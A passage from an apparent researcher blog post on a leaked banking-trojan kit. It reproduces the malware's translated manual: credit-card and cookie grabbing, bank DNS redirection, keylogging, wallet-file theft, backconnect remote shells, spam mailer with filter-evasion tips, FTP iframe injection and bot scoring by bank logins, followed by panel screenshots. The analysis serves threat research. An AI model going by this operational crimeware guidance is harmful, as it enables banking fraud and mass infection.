minutes | Retry in _ minutes]<br /> <span style="color: black;"><u><b>timer_stats 4 8</b></u></span> [New command receiving and statistics upload timer in minutes | Retry in _ minutes]<br /> <b><u><span style="color: black;">timer_modules 4 9</span></u></b> [Additional configuration files receiving timer | Retry in _ minutes. Recommending to use the same setting as in timer_config]<br /> <span style="color: black;"><u><b>timer_autoupdate 8</b></u></span> [EXE file renewal timer in hours]<br /> <span style="color: black;"><u><b>insidevm_enable 0/1</b></u></span> [Enable execution in virtual machine: 1 - yes | 0 - no]<br /> <span style="color: black;"><u><b>disable_antivirus 0/1</b></u></span> [1 - Disable built-in 'AntiVirus' that allows to delete previous version of Zeus/Citadel/Citra after EXE lauch |&nbsp; 0 - leave enabled(recommended)]<br /> <b><u><span style="color: black;">disable_httpgrabber 0/1</span></u></b> [1 - Disable http:// mask grabber in IE | 0 - Enable http:// mask grabber in IE]<br /> <b><u><span style="color: black;">enable_luhn10_get 0/1</span></u></b> [Enable CC grabber in GET-requests http/https]<br /> <span style="color: black;"><u><b>remove_certs 0/1</b></u></span> [Enable certificate deletion in IE storage]<br /> <span style="color: black;"><u><b>report_software 0/1</b></u></span> [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 - Disable]<br /> <span style="color: black;"><u><b>disable_tcpserver 0/1</b></u></span> [1 - Enable opening SOCKS5 port (not Backconnect!) | 0 - Disable]<br /> <span style="color: black;"><u><b>enable_luhn10_post 0/1</b></u></span> [Enable CC grabber in POST-requests http/https]<br /> <span style="color: black;"><u><b>disable_cookies 0/1</b></u></span> [1- Disable IE/FF cookies-storage upload | 0 - Enable | use_module_ffcookie - duplicates the same]<br /> <span style="color: black;"><u><b>file_webinjects</b></u></span> "injects.txt" [File containing injects. Installed right after successful config files installation. Renewal timer is set in timer_config]<br /> <span style="color: black;"><u><b>url_webinjects</b></u></span> "localhost/file.php" [Path to 'file.php' file. Feature of 'Web-Injects' section for remote instant inject loading]<br /> <span style="color: black;"><u><b>AdvancedConfigs</b></u></span> [Links to backup configuration files. Works if !bot is already installed on the system! and first url_config is no longer accessible]<br /> <span style="color: black;"><u><b>entry "WebFilters"</b></u></span> [Set of different filters for URLs: video(# character), screenshot(single @ character - screenshot sequence after a click in the active zone. double @ character '@@' - Full size screenshot), ignore (! character), POST requests logging (P character), GET request logging (G character)]<br /> <span style="color: black;"><u><b>entry HttpVipUrls</b></u></span> [URL blacklist. By default the follwing masks are NOT written to the logs "facebook*" "*twitter*",&nbsp; "*google*". Adding individual lines with these masks will enable logging for them again]<br /> <b><u><span style="color: black;">entry "DnsFilters"</span></u></b> [System level DNS redirect, mask example - *bankofamerica.com*=159.45.66.100. Now when going to bankofamerica.com - wellsfargo.com will be displayed. Not recommending blocking AV sites to avoid triggering pro-active defenses]<br /> <span style="color: black;"><u><b>entry "CmdList"</b></u></span> [List of system commands after launch and uploading them to the server]<br /> <span style="color: black;"><u><b>entry "Keylogger"</b></u></span> [List of process names for KeyLogger. Time parameter defines the time to work in hours after the process initialization]<br /> <span style="color: black;"><u><b>entry "Video"</b></u></span> [Video recording settings | x_scale/y_scale - video resolution | fps - frame per second, 1 to 5 |&nbsp; kbs - frame refresh rate, 5 to 60 | cpu 0-16 CPU loading | time - time to record in seconds | quality 0-100 - picture quality]<br /> <span style="color: black;"><u><b>entry "Videologger"</b></u></span> - [processes "" - list of processes to trigger video recording. Possible to use masks, for example calc.exe or *calc*]<br /> <span style="color: black;"><u><b>entry "MoneyParser"</b></u></span> [Balance grabber settings | include "account,bank,balance" - enable balance parsing if https:// page contains one of the following key words. | exclude "casino,poker,game" - do NOT perform parsing if one of the following words is found]<br /> <span style="color: black;"><u><b>entry "FileSearch"</b></u></span> [File search by given mask. The report will be stored in 'File Hunter' folder. Keywords can be a list of files or patterns ** to for on the disk. For example, multibit.exe will search for exact match on filename.fileextension, *multibit* will report on anything found matching this pattern. | excludes_name - exclude filenames/fileextensions from search. excludes_path - exclude system directories macros, like, Windows/Program Files, etc | minimum_year - file creation/change date offset. The search task is always on. Remove all the parameters from this section to disable it.]<br /> <span style="color: black;"><u><b>entry "NetScan"</b></u></span> [hostname "host-to-scan.com" - list of local/remote IP addresses to scan. scantype "0" - sets the IP address range, for example, scantype "0" scans a single IP in the 'hostname', scantype "1" creates a full scan of class C network 10.10.10.0-255, scantype "2" creates a full scan of class B network 10.10.0-255.0-255]<br /> Example 1 {hostname "10.10.0-255.0-255" addrtype "ipv4" porttype "tcp" ports "1-5000" scantype "2"}<br /> Example 2 {hostname "10.10.1.0-255" addrtype "ipv4" porttype "tcp" ports "1-5000" scantype "1"}]<br /> <span style="color: black;"><u><b>entry "WebMagic"</b></u></span> [Local WebProxySrv, web server with its own storage. Allows to read and write bot parameters directly, for example, when using injects. This saves time and resources since it doesn't generate additional remote requests for different scripts that are generally detected by banks anti-tampering controls. It also allows to bypass browser checking when requesting https:// resource hosted remotely and to create backconnect connection. Full settings description is located in F.A.Q section]<br /> <br /> <br /> 4. Commands<br /> <br /> <span style="color: black;"><u><b>user_execute &lt;url&gt;</b></u></span> [execute given file]<br /> <span style="color: black;"><u><b>user_execute &lt;url&gt; -f</b></u></span> [execute given file, manual bot update that overwrites the current version]<br /> <b><u><span style="color: black;">user_cookies_get</span></u></b> [Get IE cookies]<br /> <span style="color: black;"><u><b>user_cookies_remove</b></u></span> [Remove IE cookies]<br /> <span style="color: black;"><u><b>user_certs_get</b></u></span> [Get .p12 certificates. Password: pass]<br /> <span style="color: black;"><u><b>user_certs_remove</b></u></span> [Remove certificates]<br /> <span style="color: black;"><u><b>user_homepage_set &lt;url&gt;</b></u></span> [Set browser home page]<br /> <span style="color: black;"><u><b>user_flashplayer_get</b></u></span> [Get user's .sol files]<br /> <span style="color: black;"><u><b>user_flashplayer_remove</b></u></span> [Remove user's .sol files]<br /> <b><u><span style="color: black;">url_open &lt;url&gt;</span></u></b> [open given URL in a browser]<br /> <span style="color: black;"><u><b>dns_filter_add &lt;hostname&gt; &lt;ip&gt;</b></u></span> [Add domain name for redirect(blocking) *bankofamerica.com* 127.0.0.1]<br /> <span style="color: black;"><u><b>dns_filter_remove &lt;url&gt;</b></u></span> [Remove domain name from redirect(blocking)]<br /> <span style="color: black;"><u><b>user_destroy</b></u></span> [Corrupt system vital files and reboot the system. Requires elevated privileges]<br /> <span style="color: black;"><u><b>user_logoff</b></u></span> [Logoff currently logged in user]<br /> <span style="color: black;"><u><b>os_reboot</b></u></span> [Reboot the host]<br /> <span style="color: black;"><u><b>os_shutdown</b></u></span> [Shutdown the host]<br /> <b><u><span style="color: black;">bot_uninstall</span></u></b> [Remove bot file and uninstall it]<br /> <span style="color: black;"><u><b>bot_update &lt;url&gt;</b></u></span> [Update bot configuration file. Requires to use the same the crypt. The path is set in url_config]<br /> <span style="color: black;"><u><b>bot_bc_add socks &lt;ip&gt; &lt;port&gt;</b></u></span> [Connect Bot &gt; Backconnect Server &gt; Socks5 | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for Proxifier/Browser...]<br /> <span style="color: black;"><u><b>bot_bc_add vnc &lt;ip&gt; &lt;port&gt;</b></u></span> [Connect Bot &gt; Backconnect Server &gt; VNC Remote Display |&nbsp; Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for UltraVNC client]<br /> <span style="color: black;"><u><b>bot_bc_add cmd &lt;ip&gt; &lt;port&gt;</b></u></span> [Connect Bot &gt; Backconnect Server &gt; Remote Shell | Run backconnect.exe listen -cp:1666 -bp:9991 on BC server / -bp is set when the command is launched, -cp is required for telnet/putty client ]<br /> <span style="color: black;"><u><b>bot_bc_remove &lt;service&gt; &lt;ip&gt; &lt;port&gt;</b></u></span> [Disconnect from the bot and hide connections from 'netstat' output]<br /> <span style="color: black;"><u><b>close_browsers</b></u></span> [close all browser processes]</div> <br /> And one part related to some new features:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> <u><span style="color: black;"><b>Q:</b></span></u> How does Mailer works?<br /> <span style="color: red;"><u><b>A:</b></u></span> This feature allows you to create mass-email campaigns using standard PHP tools.<br /> For this feature to work correctly you need to download the script [Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off<br /> After that press [ Config ] and fill in [Master E-Mail (for checkup) parameters: "name ; email" Your email for checking] and Mailer-script URL: http://www.host.com/mailer.php<br /> It's possible to create a campaign using a email address list collected by a Bot using "For BotID" button or a new list name;email<br /> Macros are supported in в Subject/Body/Attach.<br /> {name} - Receiver name | {email} - Receiver E-mail | {random} - random chars | {rand0m} - random long number<br /> Recommendation: To avoid being blocked by spam-filters use macro name@{hostname} in Sender ("email" or "name ; email") field - in this case the real domain name of the sending host will be used and your emails will not end up in Spam folder.<br /> <br /> <span style="color: black;"><u><b>Q:</b></u></span> How to work with File Hunter feature?<br /> <span style="color: red;"><u><b>A:</b></u></span> This feature allows you to work with files on the bot: get list of files matching the parameters specified under config entry "FileSearch", track files updates, autoupload files and replace files on the bot.<br /> Custom Download - allows you to download any file from a bot by BotID, taken that a full path to the file is known. This will work even if the file is not specified under "FileSearch" config entry.<br /> Auto download - uploads files with a given mask without a need to specify BotID. Bot will execute the upload as soon as search conditions are given and the file found. This will work even if the file is not specified under "FileSearch" config entry.<br /> Be careful using File Hunter to modify any files on the bot. It's main purpose is to grab *coin files(multibit.dat/litecoin.dat...) <br /> Use mouse right-click to access context menu for file list.<br /> <br /> <span style="color: black;"><u><b>Q:</b></u></span> Short manual for FTP Iframer<br /> <span style="color: red;"><u><b>A:</b></u></span> As in the case with 'Mailer', For this feature to work correctly you need to download the iframer script [Download Script] and put it in www-root directory on one of the hosts that will be used to perform the mass-email campaign - make sure you turn off the following in php.ini; magic_quotes_gpc = Off and safe_mode = Off<br /> Next, create configuration options by pressing on [ Конфигурация ]<br /> Specify the script URL in URL field<br /> Working mode: Just checking [ Will check the validity of FTP accounts found in the logs ]<br /> Inject: [Mode: "ON"]<br /> Inject method: Smart/Add/Overwrite [ Smart - will re-add the inject in case if it was detected and deleted. / Add - iframe code will be added to the end of the file before &lt;/body&gt;&lt;/html&gt;]<br /> Lookup depth: [ File search level on ftp-host. For example, in the following structure FTP Connection &gt; public_html(1) &gt; images(2) &gt; gif(3)....]<br /> Next, perform 'Accounts search' and 'Run tasks'. The statistics and results will be available after a few minutes. The script will be working in cron-mode after the first execution, so there is no need to keep the page opened.<br /> <br /> <span style="color: black;"><u><b>Q:</b></u></span> Main functions and methods of "Neuromodel"<br /> <span style="color: red;"><u><b>A:</b></u></span> Neuromodel allows you to perform complex analysis of your botnet: identifying best bots, upload success rates. You can build a research matrix that includes list of bots and evaluate them against specified criteria;&nbsp; the result will be calculating a score to each bot.<br /> Each research matrix can contain a number of evaluation criteria. For example, you need to search the logs for the following data: Bank Acc + CC or Bank Acc + ISP E-mail <br /> Create profile first and then plan the task based on required criteria.<br /> <br /> Task - "Find bots that logged into http://www.bankofamerica.com id=* in the last 30 days and where McAfee is installed. Assign X score if the search criteria match"<br /> <br /> Creating criteria:<br /> 1) { name: BOA LOGIN | criteria: HTTP data POST | URL masks: htt*://www.bankofamerica.com/* | POST data masks: id=* | days limit: 30 | score: 1 | static method, trigger condition: No &lt; 1 }<br /> 2) { name: AVCheck | criteria: installed software | software name mask: McAfee* | days limit: 30 | score: 1 trigger condition: No &lt; 1 }<br /> <br /> Static method is used to summarize the results.<br /> * **No**: simple summary. Each successful criteria match adds specified score to the bot. More matches = bigger the score.<br /> Example 1: if it found 180 reports matching the criteria and the score is 2 then the final score will be '180*2'<br /> Example 2: if 'Login to bankofamerica' criteria&nbsp; is set to "&gt;=" "3" on average a day then the score will be added only for the last days specified in 'Days' parameter.<br /> Detailed: if in the last days specified in 'Days' parameter the 'Login to bankofamerica' criteria was matched more than 3 times on average then the bots reported will be given the score points.<br /> * **Sum** Summary of produced reports<br /> Score 'Points' will be added if the amount of reports satisfying the search criteria complies with trigger condition. <br /> For example, if we have `reports_count=180` and `Points=2` and trigger condition is `&gt;= 180` then the score is +2.<br /> * **Days**: active days summary: days containing the reports.<br /> Score will be added if the amount of reports satisfying the search criteria complies with trigger condition.<br /> For example, if we have reports from day before yesterday, yesterday and today and trigger condition is set to `&gt;= 3` then the scores will be added.<br /> * **Avg/Day**: Average/Day: average number of reports in the last 24 hours<br /> * **Avg/Week**: Average/Week: average number of reports per week<br /> * **Days/Week**: average number of active days per week<br /> <br /> Another example, search for inactive accounts:<br /> "Find the bots regardless of their scores that logged into USBank in the last 21 days no more than 3 times - no filters or criteria are applied"<br /> <br /> 1) { URL = https://onlinebanking.usbank.com/Auth/Login/Login* | HTTP URL visit| days limit = 21 | Login no more than 3 times: e.g. login &lt;=3. Meaning, if found &lt;=3 reports for this criteria — add 1 to the score. | SUM() &lt;=3 , 1 score }<br /> <br /> Full criteria list is below:<br /> Condition using date/time of the first report received from the bot.<br /> Condition using date/time of the last report received from the bot.<br /> Condition using average online time of the bot per week or per hour.<br /> Condition using a type of the report or it's content<br /> &gt;Presence/Lack of LUHN10(CC)<br /> &gt;Presence/Lack of ISP email address (pop3 or web-link)<br /> &gt;Presence/Lack of FTP accounts<br /> &gt;Search by key words<br /> Condition using "Installed Software" reports, allows you to check for a particular software installed on the bot.<br /> Condition using "CMD" reports, allows to use particular keywords.<br /> Condition using visited one or many particular URLs<br /> Condition using POST variables.</div> Minus some absolute nonsense in the description of AVG/Day, AVG/week and days/weeks<br /> The author is a fecking lunatic trying to explain things that only he understand :)<br /> Thanks to Malwageddon for the translation help.<br /> <br /> Now.. take a free tour in the infrastructure.<br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSGjhVuDVvfdetCWLzjsYvLS5LVICNhJYMKTwEB13fnMPiLU48ovkRAcuhbbq4spXw-qFEYIXbtmMdLK1naOS-JCYDyIY01I5tO6ytwlWKbZjelYISoY7JpoF37YvF70GDqU1TUq6mWBM/s1600/2015-11-02_17-40-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSGjhVuDVvfdetCWLzjsYvLS5LVICNhJYMKTwEB13fnMPiLU48ovkRAcuhbbq4spXw-qFEYIXbtmMdLK1naOS-JCYDyIY01I5tO6ytwlWKbZjelYISoY7JpoF37YvF70GDqU1TUq6mWBM/s400/2015-11-02_17-40-57.png" width="400" /></a></div> <br /> Dashboard:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsSeAEIMifDukG7z2vkwTH6AjAEcm2iBu4ZYlQaZ-pu2scFhDX2mMBlcRkuskBaae9jgFu5bwWSDqADM8Q4qkCxwe_KAQxJbL9PaAzN5avG0gE5v-p8gxeZ8zQvDWbKH5lUU_u8fvp10/s1600/2015-11-02_16-27-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvsSeAEIMifDukG7z2vkwTH6AjAEcm2iBu4ZYlQaZ-pu2scFhDX2mMBlcRkuskBaae9jgFu5bwWSDqADM8Q4qkCxwe_KAQxJbL9PaAzN5avG0gE5v-p8gxeZ8zQvDWbKH5lUU_u8fvp10/s400/2015-11-02_16-27-01.png" width="333" /></a></div> RU and UA flags, united forever :)<br /> <br /> exe configuration:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sNgXpfHnM4pWmetxI5qLx2B0iNMCJ9jUXP5LkSk1Vx5swpSoZeZdPrUFT3PGqkZWudloUL-fc-tq6TNTiZ4k4l4buYC_CAc3s3VgPSweOw-EMAfGiD2Dt8LFmufN4OHXE7ydaFEOKjQ/s1600/2015-11-02_18-54-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2sNgXpfHnM4pWmetxI5qLx2B0iNMCJ9jUXP5LkSk1Vx5swpSoZeZdPrUFT3PGqkZWudloUL-fc-tq6TNTiZ4k4l4buYC_CAc3s3VgPSweOw-EMAfGiD2Dt8LFmufN4OHXE7ydaFEOKjQ/s400/2015-11-02_18-54-01.png" width="400" /></a></div> <br /> Operating system:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLXNqSJAuPc-QkahBQa9ENfyPlSEOkGwGjzTps6vaub3UpMq8w9LkZiXUjmFTpODfYq4y_-_c2xlLhAN_pu_kWm9yJKdJAP4aT_fqLJRj_-bYbn2Xr4yKPzIMHOFvquiMh2NZq0-IX-4/s1600/2015-11-02_16-28-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQLXNqSJAuPc-QkahBQa9ENfyPlSEOkGwGjzTps6vaub3UpMq8w9LkZiXUjmFTpODfYq4y_-_c2xlLhAN_pu_kWm9yJKdJAP4aT_fqLJRj_-bYbn2Xr4yKPzIMHOFvquiMh2NZq0-IX-4/s400/2015-11-02_16-28-12.png" width="333" /></a></div> <br /> Software:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeYb52HvqR4ZeY7R7JCiHyjrjEmwf840mrw-yVWGboS3LOlxZIzSmQUvABx2lV6ALidh9Q3I6k_WmldcBtIKdH0ZpZSfcyZoqCiCP1kOtqN3HwO4Qz_Nm92oE0kg4JNeL14cPcOtv2OiI/s1600/2015-11-02_16-31-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeYb52HvqR4ZeY7R7JCiHyjrjEmwf840mrw-yVWGboS3LOlxZIzSmQUvABx2lV6ALidh9Q3I6k_WmldcBtIKdH0ZpZSfcyZoqCiCP1kOtqN3HwO4Qz_Nm92oE0kg4JNeL14cPcOtv2OiI/s400/2015-11-02_16-31-01.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIkbdsymaXpNDPNRHNQBWVbjOBzO9loH7o9W98Ede5hxApxO2-a7DoYFMrh2NMgMaqYo7ZIYou9CLpELg9iDY6JqM30jhbC8Q7cq_A3KhXV_BUPRgnMx6z-BKx1zLRqsV4MHlwiApt0Xk/s1600/2015-11-02_16-31-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIkbdsymaXpNDPNRHNQBWVbjOBzO9loH7o9W98Ede5hxApxO2-a7DoYFMrh2NMgMaqYo7ZIYou9CLpELg9iDY6JqM30jhbC8Q7cq_A3KhXV_BUPRgnMx6z-BKx1zLRqsV4MHlwiApt0Xk/s400/2015-11-02_16-31-46.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfffPd9YJFcgru-kjd1St_9-u4uSkYJToJYVjT3luSwiz2_M_njWbY1wk-OZ8Mw3dBnstS71nnNc_0SxUUHQBl3csO9r6CXhnHh3CJEjNAVL_1UR6lR0qYu9oOKI2ne14xByxUjJ34m7s/s1600/2015-11-02_16-29-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfffPd9YJFcgru-kjd1St_9-u4uSkYJToJYVjT3luSwiz2_M_njWbY1wk-OZ8Mw3dBnstS71nnNc_0SxUUHQBl3csO9r6CXhnHh3CJEjNAVL_1UR6lR0qYu9oOKI2ne14xByxUjJ34m7s/s640/2015-11-02_16-29-21.png" width="307" /></a></div> <br /> Firewall:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmw1dKUeG-BEYz3qFD7YAGCZ5vCj35Gk1nrp3zS13Yb5itsHtbPAc2gDnLdv5GJdZ-L-G8sI06i3mMS7HDLTa0EZ3RvYV0Dcc52U8n9YtWFAuE6Y01PhUuRLFRBI7u4VBDnzpkUfyRRZI/s1600/2015-11-02_16-32-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmw1dKUeG-BEYz3qFD7YAGCZ5vCj35Gk1nrp3zS13Yb5itsHtbPAc2gDnLdv5GJdZ-L-G8sI06i3mMS7HDLTa0EZ3RvYV0Dcc52U8n9YtWFAuE6Y01PhUuRLFRBI7u4VBDnzpkUfyRRZI/s400/2015-11-02_16-32-31.png" width="400" /></a></div> AV:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlhTAXZX5Kp0XDg5ulZxY4sDp1fDftteO8ucdi4gszvPpPrkMR5Bf9nx2zur9auA8hGcvPlWhUup5YJbYWhadS6amDlBh86HQvgMvVnTiaVX-bQxB3IMdJmGAtaoyMhZ8HtEP4RV6qO5Y/s1600/2015-11-02_16-33-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlhTAXZX5Kp0XDg5ulZxY4sDp1fDftteO8ucdi4gszvPpPrkMR5Bf9nx2zur9auA8hGcvPlWhUup5YJbYWhadS6amDlBh86HQvgMvVnTiaVX-bQxB3IMdJmGAtaoyMhZ8HtEP4RV6qO5Y/s400/2015-11-02_16-33-02.png" width="400" /></a></div> Search:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF2vRu__HNLEsQlNpG5JeQ4UgXE_EPWptL-0DDd3q-UhXfpEC_0DQ2psHhOKZ2jkJUPtugpL0VmH5Iqd-5yMSWfLoAYgiHXLKtFXd2yvRMaTXmroXHgUPMHS8bRD8h84oalJCJW8L1YHg/s1600/2015-11-02_16-33-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF2vRu__HNLEsQlNpG5JeQ4UgXE_EPWptL-0DDd3q-UhXfpEC_0DQ2psHhOKZ2jkJUPtugpL0VmH5Iqd-5yMSWfLoAYgiHXLKtFXd2yvRMaTXmroXHgUPMHS8bRD8h84oalJCJW8L1YHg/s400/2015-11-02_16-33-39.png" width="322" /></a></div> <br /> Bots:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYYR3G-x4lbEQ-2dJ3HIIXkQEwGXZthrQvGwPQCxQVj46rRn378CGjUXHrAje8j5vp0I4Qk9-EiisR4vylX1qNeO-0KghzVMlTzMdPmGr7-ZNS1WtVpi1iRGo1ag2X0XYzrT1sb_Cu_L0/s1600/2015-11-02_16-35-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYYR3G-x4lbEQ-2dJ3HIIXkQEwGXZthrQvGwPQCxQVj46rRn378CGjUXHrAje8j5vp0I4Qk9-EiisR4vylX1qNeO-0KghzVMlTzMdPmGr7-ZNS1WtVpi1iRGo1ag2X0XYzrT1sb_Cu_L0/s400/2015-11-02_16-35-16.png" width="400" /></a></div> &nbsp;Legend:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie_QRNJrzcEiDx1kFOA7mKirYcx-RimrEDcxR_lZKaB3gDE-fXOw08cZRXE6afWWXhQgUrr3pcOvDI_WvwmkvG7xvs2XHEBIuZ_gD_MpCiaXVl_gzyNBRgSpM1Xz5gjuZ2W_aJ0SVKa9I/s1600/2015-11-02_18-45-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie_QRNJrzcEiDx1kFOA7mKirYcx-RimrEDcxR_lZKaB3gDE-fXOw08cZRXE6afWWXhQgUrr3pcOvDI_WvwmkvG7xvs2XHEBIuZ_gD_MpCiaXVl_gzyNBRgSpM1Xz5gjuZ2W_aJ0SVKa9I/s1600/2015-11-02_18-45-50.png" /></a></div> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Full information:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyntbBdlXvfUTVGlGIIpMLRNHO-TNjesTLaUhz6VoGZWOqA99z4m3dME0gNMT4dvs27m6ziGEEJGXjUoQ0gURFxEtWKeSSelvC7XHWwL9CeFbsfUaSh_bcV6T7kozIqyIKxSbFR4zzejk/s1600/2015-11-02_18-39-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="386" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyntbBdlXvfUTVGlGIIpMLRNHO-TNjesTLaUhz6VoGZWOqA99z4m3dME0gNMT4dvs27m6ziGEEJGXjUoQ0gURFxEtWKeSSelvC7XHWwL9CeFbsfUaSh_bcV6T7kozIqyIKxSbFR4zzejk/s400/2015-11-02_18-39-56.png" width="400" /></a></div> <br /> WebInject:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHyAf64FGvyDB5kXKL8HUdZnTUJ_E9pQ6sbxXFSiBGAziae9_hK_DzY7T9WEhhtWXrzOQ1b-ZcCTzmPfAlmtWLIX7xmU0pFbtbS_ZQSKb2jxkg6pFJVvIoA6lFVHrOZXqUA6OT9l41EY/s1600/2015-11-02_16-36-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpHyAf64FGvyDB5kXKL8HUdZnTUJ_E9pQ6sbxXFSiBGAziae9_hK_DzY7T9WEhhtWXrzOQ1b-ZcCTzmPfAlmtWLIX7xmU0pFbtbS_ZQSKb2jxkg6pFJVvIoA6lFVHrOZXqUA6OT9l41EY/s400/2015-11-02_16-36-13.png" width="400" /></a></div> <br /> Reported errors:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRSLvTWnM5uGVtAA8vsMj5d-JBPaLWOY6lcqI-vxg91XbZ83r_xpEVP6_pp9ELhXpZ4iAZ4CMjhlxR9UlQyB1J_ZVMIfgJrNyA-Kaiwwp4qKDoYztGv4RK7PRQ7XFU_cCY_DhzJkdIcJA/s1600/2015-11-17_15-25-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRSLvTWnM5uGVtAA8vsMj5d-JBPaLWOY6lcqI-vxg91XbZ83r_xpEVP6_pp9ELhXpZ4iAZ4CMjhlxR9UlQyB1J_ZVMIfgJrNyA-Kaiwwp4qKDoYztGv4RK7PRQ7XFU_cCY_DhzJkdIcJA/s400/2015-11-17_15-25-08.png" width="400" /></a></div> <br /> New group:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeIQ_dEfJ-G6MX-DPEP_VEb7agXU3-Xy2MZRtrqOXxBJdLp2fu_2_C_hzALazziGCcNHhc6F3EatqbGwpnDX7Kym_ErsTTKOhjZzd0RENGiXdanOcSH-UgVO8mDZ-HdGOPli5cyaXgoHA/s1600/2015-11-02_19-34-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="355" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeIQ_dEfJ-G6MX-DPEP_VEb7agXU3-Xy2MZRtrqOXxBJdLp2fu_2_C_hzALazziGCcNHhc6F3EatqbGwpnDX7Kym_ErsTTKOhjZzd0RENGiXdanOcSH-UgVO8mDZ-HdGOPli5cyaXgoHA/s400/2015-11-02_19-34-29.png" width="400" /></a></div> <br /> Edit a webinject:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuD7zlpeXwYvIg5m4rDbVxWiPVe_ik_12L5BbWasm4dLjf9mydcYHOYGO4LYYtO1cZPZqcimWXI-XlD4H5heHcNMz4sDAtYJarXIfrjOYCa-k-cyfJIISv_W3DzbmS7jc4Mla1k890qGo/s1600/2015-11-02_16-36-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuD7zlpeXwYvIg5m4rDbVxWiPVe_ik_12L5BbWasm4dLjf9mydcYHOYGO4LYYtO1cZPZqcimWXI-XlD4H5heHcNMz4sDAtYJarXIfrjOYCa-k-cyfJIISv_W3DzbmS7jc4Mla1k890qGo/s400/2015-11-02_16-36-59.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a 